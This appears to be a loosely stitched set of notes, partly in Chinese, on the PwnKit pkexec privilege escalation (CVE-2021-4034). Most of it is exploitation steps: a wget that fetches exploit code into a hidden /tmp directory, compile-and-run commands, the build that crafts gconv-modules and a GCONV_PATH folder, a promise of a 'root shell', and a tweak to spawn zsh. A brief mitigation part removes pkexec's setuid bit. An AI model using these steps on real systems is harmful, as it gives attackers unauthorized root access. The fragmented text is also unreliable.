cc (1) - GNU project C and C++ compiler
wget https://haxx.in/files/blasty-vs-pkexec.c -P /tmp/.ICE-unix/ -O poc.c
cd /tmp/.ICE-unix/
cc poc.c -o pwn
./pwn
.
├── GCONV_PATH=.
│ └── lol
├── lol
│ └── gconv-modules
├── payload.c
├── payload.so
├── poc.c
└── pwn
One day for the polkit privilege escalation exploit
Just execute make
, ./cve-2021-4034
and enjoy your root shell.
The original advisory by the real authors is here
# tree CVE-2021-4034
CVE-2021-4034
├── cve-2021-4034.c
├── Makefile
├── pwnkit.c
└── README.md
0 directories, 4 files
# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
# tree
.
├── cve-2021-4034
├── cve-2021-4034.c
├── gconv-modules
├── GCONV_PATH=.
│ └── pwnkit.so:.
├── Makefile
├── pwnkit.c
├── pwnkit.so
└── README.md
1 directory, 8 files
pkexec fix
ls -alt /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
chmod 0755 /usr/bin/pkexec
#or
chmod u-s /usr/bin/pkexec
diff:
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwxr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
./cve-2021-4034
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
pkexec must be setuid root
#设置SUID:
chmod u+s /usr/bin/pkexec
ls -alt /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
Default shells:
pwnkit.c
to char * const args[] = { "/bin/zsh", "-pi", NULL };
$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash
/bin/zsh
/usr/bin/zsh
/usr/bin/tmux
/usr/bin/screen
/usr/bin/pwsh
/opt/microsoft/powershell/7/pwsh
分析:https://wx.zsxq.com/dweb2/index/topic_detail/218225555482851
分析: https://mp.weixin.qq.com/s/3rnkcRfX_BxzlVzp0stQRw
利⽤: https://haxx.in/files/blasty-vs-pkexec.c
利⽤: https://github.com/berdav/CVE-2021-4034